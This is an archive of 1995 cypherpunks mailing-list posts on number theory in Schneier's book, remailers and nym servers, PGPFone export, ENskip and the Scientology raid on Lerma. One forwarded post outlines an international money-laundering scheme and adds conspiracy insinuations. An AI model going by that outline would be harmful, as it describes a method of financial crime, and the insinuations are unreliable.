         1       1               1
         4       9               3
         9       4               2
         11      16              4
         16      11           ***9
         29      29           ***8


***How are these square roots?  9 is certainly not the square root of 11, nor is
8 the square root of 29, even modulo 35.  

2)By the same token, on the previous pages Schneier uses the expression
        (1/v), which I take to mean "the quantity one divided by the value 
                                                   -1
        of v", while the example expresses it as (v  ) which I take to 
        mean "the inverse of v."  Are these two expressions interchangeable
        or is this something that I should have found in the errata?

3)Speaking of errata, where can I find a copy?

4)Now, going back to the number theory, I've got a few more questions re:
quadriatic
residues.
        a)On page 293, the residues are listed as, "the possible quadriatic
residues"
        Is it possible to predict the possible quadriatic residues, or is an
exhaustive
        search of the values from on the interval [1,n] necessary to find the 
        quadriatic residues of modulo n?


5)From what does Feige-Fiat-Shamir derive its security?  Obviously not
discrete logs,
but I'm not sure I understand the protocol sufficiently to be able to see
where it 
derives its security.

To those of you who aren't interested, thanks for reading so far, and with
this we
return you to your regularly scheduled conspiracy rants, personal attacks,
and other 
random nonsense.  To those of you who can respond, any assistance is
appreciated.

Ben.
***********************************************************************
Ben Samman					     Samman@cs.yale.edu
I'm on vacation now, so e-mail will recieve a latency of +/- 24 hours.
		PGP Key available from keyservers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@cs.yale.edu>
Date: Sun, 13 Aug 95 18:19:52 PDT
To: Derek Atkins <warlord@ihtfp.org>
Subject: Re: Q's on Number Theory/Quadriatic Residues
Message-ID: <199508140119.AA14883@minerva.cis.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 05:47 PM 8/13/95 PDT, Derek Atkins wrote:
>>                  -1             -1
>>         v       v         sqrt(v  )
>>          16      11           ***9
>>          29      29           ***8
>> 
>> ***How are these square roots?  9 is certainly not the square root of
>> 11, nor is 8 the square root of 29, even modulo 35.
>
>Bzzt!  Try Again.  If you use bc, you will notice that 9^2 mod 35 == 11
>and 8^2 mod 35 == 29...  You should go take your number theory class!

Definitely. Is there an easy way to get from the 29 to the 8?  I can see how
it goes
the other way, but what I didnt' see was how, if given 29, I could get the
8? (Euclid's?)

>
>>         mean "the inverse of v."  Are these two expressions interchangeable
>>         or is this something that I should have found in the errata?
>
>Yes.  It is the multiplicative inverse.  This is very basic math.  Go
>re-read your 7th-grade algebra book:
>	v^(-1) == 1/v

Ok.  I wasn't thinking of multiplicative inverse when doing this--I guess I
wasn't in the right frame of mind.

>Take your number theory class, and if you can't figure out after that,
>re-ask the questions.

I'll take the course, but you still needn't be so swarmy about it.

Ben.
***********************************************************************
Ben Samman					     Samman@cs.yale.edu
I'm on vacation now, so e-mail will recieve a latency of +/- 24 hours.
		PGP Key available from keyservers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 13 Aug 95 18:23:16 PDT
To: cypherpunks@toad.com
Subject: Bet e$ on how long it will take for PGPFone to make it overseas!
Message-ID: <199508140120.VAA24979@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To loosen up the often so serious discussions on the list, I propose a
little game. PGPFone's release is about a week away. PRZ is trying his
hardest to keep it from being exported. Still, I have the feeling that
some irresponsible cyphercriminal will break US law and export PGPFone
anyway. Let us bet cyberbucks on how long it will take for this crime to
happen. Here is my initial offer:

I bet e$50 that PGPFone will have been exported 24 hours after its final
release has been announced to this list. Who is willing to take the bet?
Perhaps someone is willing to bet at less time?

Have fun,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMC6k0CoZzwIn1bdtAQExpwF+JN52E31iW2XIepF1eINcDLJIrxsyY+4Y
Dkc8HTBQdKZch6RAah+MT8/Q2ALSIwgO
=TpOg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 13 Aug 95 19:48:48 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: My pseudo-anonymous dream list
Message-ID: <Pine.ULT.3.91.950813213118.8694A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There was some talk on Friday about "nym" servers similar in operation 
to anon.penet.fi.  I was meaning to provide some commentary on Friday, 
but it kinda got pushed back by a lazy weekend.

Anyways, I wanted to toss some non-technical things into the fray about 
what I'd like to see in a good "nym" server.  If you grow weary from my 
wish-rants, press 'd' now :-)

==============

Anon.penet.fi is arguably one of the most used anonymous servers on the 
Internet.  One of the chief reasons it is used so much by so many so 
often is because it is also the easiest to use.  Posting to a newsgroup 
or mailing to another person is handled without having to think about 
anything.  This is quite unlike most anonymous remailers which require 
quite a bit more work (for the lay person) for only one-way mailing.

Any future remailers (and for the purpose of this message, assume
"remailer" means a pseudo-anonymous remailing mechanism like penet.fi)
will need to maintain the ease of use that penet.fi has.  No messy headers
of embedded command lines.  Just send the message to an address and it's
taken care of. 

There are, however, a great number of internal improvements that could be 
made that would both improve user-end usefulness AND improve overall 
security.

1)  Multiple Remailers:
I'd like to see multiple (maybe >12) remailers that utilize the same
database, upgraded by batched processes once or twice a day or "broadcast"
realtime to all the reamilers in the web (probably the latter is better). 
In this way, a person with a pseudo-ID of FOO, could be addressed as FOO
at ANY of the remailers.  The primary purpose of this is to allow easy
chaining (see below), but it might also serve to distribute much of the
load around the net.  Penet.fi is grossly overloaded, so a solution to
that needs to be found. 

2)  Encrypted Databases:
One of the failings of anon.penet.fi that has been exploited by by 
various LEAs is the fact that the database of users is accessible by the 
operator.  Any properly designed 'nym' server should have a totally 
encrypted database.  Thus if your local LEA roams by demanding to know 
the name of the person associated with an ID, the best the operator can 
do is to give them a copy of the encrypted entry from the database (or, I 
suppose, the entire database :-)

3)  Limited ID lifetime
Another failing, IMHO, with penet.fi is that ID#'s have an unlimited 
lifetime.  I think any remailer should limit the lifetime of any ID to no 
longer than 12 months, with six months being the default, and 3 months 
being an option (plus, of course, a manual cancelation on the part of 
the user).  When an ID is expired, it is removed entirely from the 
database and NOT reissued again.

4)  Chained Mailings
Because you have many remailers operating, all messages should be randomly
chained through them.  Perhaps the default number of hops is three, with
the user-definable of 1 to 20.  This means that while I might send a
message to alt.sex.abuse.recovery@anon.mit.edu, it might end up being
posted from anon.berkeley.edu after passing through anon.umn.edu and
anon.toad.com.  It makes traffic analysis that much more difficult. 
Before a chaining is done, the remailer should ping the target remailer to
make sure it is up, so that mail isn't sitting in the queue.  All chained
mail should also be encrypted. 

5)  Encryption/Signature Validation
Any message that is emailed PGP signed should be validated by the remailer
(with the User having to email in their public key as part of the
registration process, if they so choose, or remailers can use the
keyserver).  If the signature is valid, a line is added in remailer
information section to the effect of "Message PGP Validated" and then sent
PGP signed by the remailer. (the original sender's PGP signature is
removed). 

An encrypted message should simply be PGP Signed by the final remailer 
posted/emailed to the destination

Because there are multiple remailers (chained), only the final remailer 
should sign the message.

6)  Two-way
This goes pretty much without saying.  If I send mail to somebody or post 
to news through a remailer, the person who received the message should be 
able to reply to my anonymous mailbox and I get the message (signed, of 
course, by the remailer).

7)  Option Validation
In order to change any of the options on your ID (ie, the expiration date
of your ID, or to expire it immediately, or to set the number of "hops" 
you want to chain through), you should have to submit a PGP Signed command
message.  Then, similar to a LISTSERV that confirms subscriptions and
unsubscriptions, a message is sent back asking you to "ok" these changes. 
This return message is sent as PGP encrypted email to your public key. 
When you decode it, you are given a, say, 10digit code string that you need
to mail back to confirm the changes. If you don't, it doesn't.  

This helps keep down spoofing of messages changing your options without
your ok.  It's not perfect, and isn't totally secure, but it will catch
many.  In addition, you encourage the use of PGP by requiring it for
changing any options.  You can still use the remailer without PGP, but you
can't access the options and are stuck with the defaults. 

However, one item that should not be allowed to be changed is your email 
address.  If you move from foo@blah.com to blah@foo.com, you need to get 
a new ID, and expire the old one (or it will die by itself within a 
year). 

8)  Robust Web of Remailers
Remailers come and go daily.  Any pseudo-anonymous remailer web needs to
be able to handle that fact.  Thus, a mechanism needs to be put into place
to allow for easy adding of a new machine (if it's easy, more people will
do it) with minimal maintanence.  In addition, if a remailer disappears
(say, because somebody caught wind of it and ordered the student to turn
it off :-), the rest of the remailer web needs to be able to survive.  Of
course, that particular address will be dead, but with apprpriate FAQs
posted around, people should be able to quickly find another address that
uses the same database. 

9)  Proper PR
This beeds to be properly advertised as well.  Penet.fi, whether good or 
bad, has a reputation of being a breeding ground for law-breakers.  Any 
web set up needs to be pushed as nothing more than a "P.O. Box" on the 
Internet or some such.  In reality, nothing is different, but in the 
public light, it would work better.

10)  There is no number 10

=====================

Hmm, guess that's about it.  Comments are appreciated (really they are :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMC6dmTokqlyVGmCFAQFrdAP/c/tWh9EtobXW4mTWKaWf7B+uaLJjQ/fW
UwTkJKIsZYsoj3fzeTMN4lLNd0x2sIJdB+uCduTCm6UFPzlYVa9GKk2TmO+odtvd
4sCjqnYb0JDmxSWO2lC6OW6GiswTabpCbJ/tq4eSMHXZkM/UYfN3HQjupDQ7nPny
VpxcAlNHueQ=
=IUA6
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Germano Caronni <caronni@tik.ee.ethz.ch>
Date: Sun, 13 Aug 95 13:03:53 PDT
To: cypherpunks@toad.com
Subject: SKIP (Security on the IP Layer) Sources
Message-ID: <199508132003.WAA02584@ktik6>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Hello everybody,
I am not in the cyberpunks mailing list, but I feel you might perhaps be
interested in this:

the Swiss version of SKIP is now available as a pre-alpha source code release
for IRIX, NetBSD, Nextstep and Solaris.
You may get it from ftp://ktik0.ethz.ch/~ftp/pub/packages/skip.

Have fun,
    Germano


Excerpt from the README:
========================================================================
This is ENskip, pre-alpha 0.10. ENskip is a security module for the TCP/IP
stack. It provides encryption, authentication and sequencing of packets on
the IP layer between two or more machines. For more information on the SKIP
protocol, see the Internet Draft draft-ietf-ipsec-aziz-skip-00.txt and
following. You might also want to check http://skip.incog.com for information
about the background, the protocol itself and future directions of it.

ENskip is pre-alpha. If you are not absolutely sure what this is all about,
you might want to read the draft, and perhaps reconsider using this package.

No bug-fixes, installation help or any other support is granted. If you
have any suggestions, comments or contributions to make ENskip work better,
mail to skip@tik.ee.ethz.ch.

Enjoy!

M. Hauber and Ch. Schneider
G. Caronni
=======================================================================


- -- 
<...cookie space for rent...>

Germano Caronni    caronni@tik.ee.ethz.ch    http://www.tik.ee.ethz.ch/~caronni
PGP-Key-ID:7B7AE5E1                            997C6DC4AF930A5D2D5D6AEAA196C33B

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMC5akrH8jId7euXhAQE2ugQApLxGxEyzZ3+dj+nC/QSoW97fErMevWcY
pJ96Ge2Jk6Ct06qMgIsuQCEY8/SA9iZX4VYe7Pmg/orvc2kStgs3ApeV97ocLoWo
8YzFRH06K/X6Vrrps8vSBy0vtUD2FGQWvbiUviNDnN2O2kf7FqyoNbX3lIzdHQBF
NVhs/+bMqHQ=
=gozW
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 14 Aug 95 01:26:37 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
Message-ID: <199508140823.BAA14036@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 PM 8/13/95 -0400, you wrote:
>I bet e$50 that PGPFone will have been exported 24 hours after its final
>release has been announced to this list. Who is willing to take the bet?
>Perhaps someone is willing to bet at less time?

Not a chance I'd take this bet!
1) My e$ haven't arrived....
2) If there were a serious risk of you losing, I know you're a good
law-abiding guy, but you might have a "friend" who would help you out by
exporting it in a hurry :-)
3) 24 hours sounds like a reasonably safe upper limit for the export time.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Mon, 14 Aug 95 02:00:21 PDT
To: cypherpunks@toad.com
Subject: Re: Bet e$ on how long it will take for PGPFone to make it  overseas!
Message-ID: <199508140859.BAA15661@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<giggles>
24 minutes was a more reasonably safe upper limit.
I just wondered why Alex got to have all the fun!
Maybe I should move across the water or something?
</giggles>

>3) 24 hours sounds like a reasonably safe upper limit for the export time.
># Bill Stewart, Freelance Information Architect
<sadness>
RIP, Mick
RIP, Jerry
</sadness>

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMC8QSIrpjEWs1wBlAQHEGAP+J+jnpkQGsSFYzc2zrZuDztjKEatcxiWK
ShfjjYvfjZKRMyuk1A6vl3UjMKjZaevdLcC2slgRzzU2KKCclwM7rQLcmgTrJKkZ
4v71bKnqDxBqx8WlPAKjj8RhACy296X7KX2AqetmBLoZGl2dwCxzbuZ1l7Zw7pQ9
jeuahRi4raw=
=lN/A
-----END PGP SIGNATURE-----

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Mon, 14 Aug 95 03:05:35 PDT
To: cypherpunks@toad.com
Subject: How to launder money (internationally) (fwd)
Message-ID: <ZLwLw4NQn0ER084yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-------- Forwarded message --------
Date:      Sat, 12 Aug 1995 13:37:24 est
From:      Gary Livermore <gary.livermore@p4.f507.n300.z1.aen.org>
To:        Multiple recipients of list CHAT <CHAT@AEN.ORG>
Subject:   How to launder money (internationally)

How dirty drug money is laundered internationally:
[From National Geographic, Vol.183, No.1 Jan.1993, pg105]
Titled: The Power of Money, by Peter T White, Asst. Editor,
quoting his sources as the "Centre for International
Documentation of Organized and Economic Crime, located
in Cambridge, England.

[begin this section]
==================================================================
This as a real-life example:

A U.S. organized crime group with a lot of hot cash forms a cozy
relationship with the central bank of a British Commonwealth
country.  Diplomats of that country carry the cash out of the
U.S.  If it's $10,000 or more, they are supposed to report that
to U.S. Customs, but they don't; they "externalize" the cash.
It goes into the central bank and then into various dummy companies
in different countries in return for shares in those companies.
The money is thus "agitated," so it'll be just about impossible for
investigators to follow.  Then, to "repatriate" the money, dummy
companies in the U.S. sell their worthless shares to investors in
Britain - who are in fact in on the scam - and behold, the money
is back in the U.S., clean!  Now it buys legitimate businesses,
banks, political power.

An operation like this, involving highly placed officials, and
businessmen, will cost quite a bit, maybe 35 percent, but once
the system is in place, people will want to use it - not only
drug profiteers but also arms dealers, terrorist organizations,
intelligence agencies...

A prime haven for such shady customers was BCCI, the Bank of
Credit and Commerce International, headquartered in Luxembourg
and the Cayman Islands with branches in 72 countries.  It is said
to have secretly controlled the First American Bank of Washington, D.C.
After BCCI collapsed in 1991, having defrauded depositors of several
billion dollars, it became known as the Bank of Crooks and
Criminal International.
=================================================================
[End, this section]
Can you say Mena - Clinton - Whitewater, 3 times real fast?!?

In the very next section, there is an interesting little number
used by the bank/finance crowds, it's number "72".

[begin this section]
===========================================================
- the rule of 72.  No one is certain who first developed the rule,
but the principle is quite simple:  Divide any number into 72  and
the answer tells how long it will take for a sum to double in
financial terms.

Are you charged 18 percent interest on the unpaid balance of your
credit card account?  Eighteen goes into 72 four times - so the
debt would double in four years.  Say your annual raise is 6
percent; that number goes into 72 twelve times, so in twelve
years your salary will double.  The same holds true of any
investment.  And what if inflation runs at 6 percent a year?
Then after a dozen years your money will be worth half as much,
so in a sense you'll be back where you started.
===============================================================
[end this section]

Gee, now I wonder if the money-changers figured this into
setting annual inflation rates!  Kind of keeps the middle
class down, and stuck in a rut.

*****My footer*********************************************************
"We conclude that the Reserve Banks are not federal instrumentalities
for purposes of the FTCA (Federal Tort Claims Act), but are independent,
privately owned and locally controlled corporations"
                                Lewis v. U.S. F.2d  (1982)
***********************************************************************

... Those who follow like sheep deserve to get fleeced.

--- PPoint 1.92
 * Origin: Arizona's West Coast. My Point, Exactly! (1:300/507.4)
SEEN-BY: 102/975 106/64 108/155 124/4014 132/209 133/1007 138/179 147/3032
SEEN-BY: 203/8888 231/110 511 955 236/48 260/104 300/507 704 356/3 369/85
372/5







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Mon, 14 Aug 95 03:05:37 PDT
To: cypherpunks@toad.com
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
In-Reply-To: <199508140120.VAA24979@bb.hks.net>
Message-ID: <GSwLw4NQns/I084yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <199508140120.VAA24979@bb.hks.net>,
shamrock@netcom.com (Lucky Green) wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>To loosen up the often so serious discussions on the list, I propose a
>little game. PGPFone's release is about a week away. PRZ is trying his
>hardest to keep it from being exported. Still, I have the feeling that
>some irresponsible cyphercriminal will break US law and export PGPFone
>anyway. Let us bet cyberbucks on how long it will take for this crime to
>happen. Here is my initial offer:

>I bet e$50 that PGPFone will have been exported 24 hours after its final
>release has been announced to this list. Who is willing to take the bet?
>Perhaps someone is willing to bet at less time?

I don't bet money but I'd bet a debit note of 1U$ that it'll happen after
it appears in someones home directory, is multiply encrypted and
anonymously mailed. I give it about 78msec after the recievers local
hardware is done crunching for it to be on it's way. ;-)

I say substantially less than 24hrs...

Ayep.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 14 Aug 95 06:50:48 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199508141350.GAA22629@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 14 Aug 95 6:00:15 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net         **-*+--+---   1:32:10  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           +#**-#####*#     4:15  99.98%
portal   hfinney@shell.portal.com         #******#.-*#  1:42:00  99.98%
replay   remailer@replay.com              ************     9:36  99.97%
alumni   hal@alumni.caltech.edu           ****-***.-*#  2:05:47  99.97%
hacktic  remailer@utopia.hacktic.nl       ************    11:33  99.95%
crown    mixmaster@kether.alias.net       -----------   2:07:40  99.95%
rmadillo remailer@armadillo.com           +-+**++**     1:06:24  99.95%
vox      remail@vox.xs4all.nl             ....-.-.---  14:52:58  99.99%
penet    anon@anon.penet.fi               -++*++++++*+  1:45:24  99.76%
hroller  hroller@c2.org                   #**+*---##*     35:04  99.65%
syrinx   syrinx@c2.org                    -----------   2:30:12  99.61%
mix      mixmaster@remail.obscura.com     --------++-   2:30:54  99.53%
c2       remail@c2.org                    +++-+---+++   1:24:36  99.49%
flame    remailer@flame.alias.net         ++++++++++++    51:10  99.11%
vishnu   mixmaster@vishnu.alias.net        **------ -   2:38:17  98.91%
ideath   remailer@ideath.goldenbear.com   .--_.---.-    7:32:04  98.59%
gondolin mixmaster@gondolin.org           +***+ +*--*-  1:03:25  98.52%
ford     remailer@bi-node.zerberus.de     **-** ***#*#     5:31  96.93%
rahul    homer@rahul.net                  ++**+#*##**#     3:42  99.99%
extropia remail@extropia.wimsey.com       -.-.-...     21:12:59  83.13%
rebma    remailer@rebma.mn.org            ..---+--      9:53:43  68.81%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Mon, 14 Aug 95 07:44:59 PDT
To: cypherpunks@toad.com
Subject: E-Systems Digitrac 6700
Message-ID: <199508141444.HAA15938@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May writes:

>It gets back to the threat model. If the threat model is
>interception by the neighborhood kids, then schemes for
>frequency-hopping, scrambling, "warbling," and PhasorPhone-like
>diddling are OK. If the threat model is the local police
>department tapping one's phone, probably not enough, as they
>likely can gain access to the E-Systems DigiTrac 6700 and
>trivially unscramble the signal.

 Ok, I'll take the Bait. What else can you tell us about the E-
systems Digitrac 6700?

"enquiring" minds want to know.......;)

Brian D Williams
Cypherpatriot




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Mon, 14 Aug 95 06:05:37 PDT
To: cypherpunks@toad.com
Subject: premail www interface
Message-ID: <199508141305.IAA19498@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I have worked the kinks out and now announce the premail www interface.
The interface uses preamil to send you mail anonymously  without fuss or
muss.  If you are not familiar with premail, check the page out and see
what is all about.  You can find the premail script on Raph's pinging
page.

The interface should be bug free, but if you find any, let me know.  I
welcome comments/flames/criticisms.  If there are suggestions for upgrades
or future ideas, let me know.

The cpremailer that I have up is still there.  These two www interfaces
should serve many people well.  The suggestions  I received for the 
cpremailer have been implemented so that you, the user, selects the number
of remailers to use.  No more hardwiring and there is nothing that forces
you to chain.

http://miso.wwa.com/~dochobbs/premail.html   <-premail interface
http://miso.wwa.com/~dochobbs/cpremailer.html  <-  nate's www remailer

If anyone has designed a similar remailer interface for premail, let me
know. I would like to know how you did it differently. 

Of course this email is coming to you from the premail gate.

Michael Hobbs
dochobbs@wwa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 14 Aug 95 06:28:43 PDT
To: remailer-operators@c2.org (Remailer Operators List)
Subject: CoS Raid on "Copyright Terrorist"
Message-ID: <9508141328.AA22188@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Some CoS news:

This past Saturday (95/08/12) a prominent Church of Scientology litigator,
Helena Kobrin, and some U.S. federal marshals raided the home of Arnaldo
Lerma, seizing pretty much all his computer hardware, disks, etc. It seems
that back in 1993, CoS was suing someone named Steven Fishman. As part of the
legal proceedings he filed a "declaration", which routinely became part of 
the public record of the business of the court. This happens to have included
some of the OT documents which the CoS claims as both copyrighted trade 
secrets and sacred texts.

As with other unsealed court documents, copies of the Fishman declaration are
available by snail mail from the court for 50 cents/page. Lerma ordered a
copy from the court, then posted it to alt.religion.scientology. Now CoS is
claiming copyright infringement. Helena Kobrin apparently wants to advance the
state of the art in Infocalypse hyperbole; she is quoted in a wire service
story as saying, in reference to Lerma's posting,

	"What he was engaging in was a form of copyright terrorism"

Meanwhile, various sites have started carrying copies of the Fishman 
declaration, made available by http, ftp, gopher, finger, etc. A site in
China was one of these data havens, until the resultant traffic load forced it
to shut down. David Touretzky, a member of the CS faculty at Carnegie-Mellon, 
had a complete copy on his Web pages at http://www.cs.cmu.edu/~dst/Fishman/ 
until CMU's legal counsel received a fax from Helena Kobrin, demanding their
removal.

Pending review by the CMU legal staff, he has taken them off. However,
he is maintaining a list of links to sites that still carry copies of
the declaration, along with pointers to some other relevant sites, and his
own comments on the situation.  Apparently quite a few other a.r.s folks
and their ISPs have received similar warning letters from HKK. Someone did
a fairly competent forgery on a.r.s of a version of the warning letter,
purportedly from Helena Kobrin to the entire net. I found it disturbingly
plausible. Also, someone forged cancels of various articles including parts of
the Fishman declaration, and of at least one which quoted no more than 
Touretzky's URL. 

A couple of other interesting sources for information on the Scientology/Net 
situation I've found recently are: http://amazing.cinenet.net/scientology.html
